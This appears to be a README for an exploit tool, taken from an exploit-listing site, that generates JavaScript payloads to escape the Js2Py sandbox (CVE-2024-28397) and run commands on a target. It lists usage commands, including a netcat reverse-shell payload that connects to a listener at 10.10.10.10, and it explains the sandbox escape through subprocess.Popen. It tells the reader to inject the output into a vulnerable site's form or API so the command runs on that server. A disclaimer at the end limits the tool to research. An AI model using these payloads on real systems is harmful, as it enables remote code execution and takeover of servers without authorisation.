## https://sploitus.com/exploit?id=DDFBFAE7-6A50-5CEF-A36C-7A837CF9C9AD
# CVE-2024-28397: Js2Py Sandbox Escape Payload Generator



A professional payload generator for **CVE-2024-28397**. This tool generates malicious JavaScript code designed to escape the `js2py` sandbox (versions <= 0.74) and execute arbitrary commands on the target system.
## π¨ Vulnerability Details
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Affected Component:** `Js2Py` <= 0.74
- **Impact:** Remote Code Execution (RCE) / Sandbox Escape
- **Mechanism:** Exploits `Object.getOwnPropertyNames` to access Python's `subprocess.Popen` class from within the JavaScript environment.
## π Usage
This script generates the exact JavaScript payload needed to exploit the vulnerability. You do not need to install `js2py` to use this tool.
### 1. Generate a Payload
Run the script with the command you want to execute on the victim's machine.
```bash
# Generate payload to run 'id'
python3 exploit.py -c "id"
```
```bash
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
```
### 2. Attack the Target
Copy the output generated by the tool and inject it into the vulnerable application (e.g., a web form, API endpoint, or configuration file that is parsed by `js2py`).
**Example Injection:**
If a website takes user input and runs it with `js2py.eval_js(user_input)`, pasting the generated code will execute your command on their server.
## π Example
```bash
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
```
## π¨βπ» Author
**Ali SΓΌnbΓΌl (xeloxa)**
- π§ Email: [alisunbul@proton.me](mailto:alisunbul@proton.me)
- π Website: [xeloxa.netlify.app](https://xeloxa.netlify.app)
- π GitHub: [@xeloxa](https://github.com/xeloxa)
## β οΈ Disclaimer
This software is provided for **educational and security research purposes only**. The author accepts no responsibility for any misuse of this code. Ensure you have explicit permission before testing this on any system you do not own.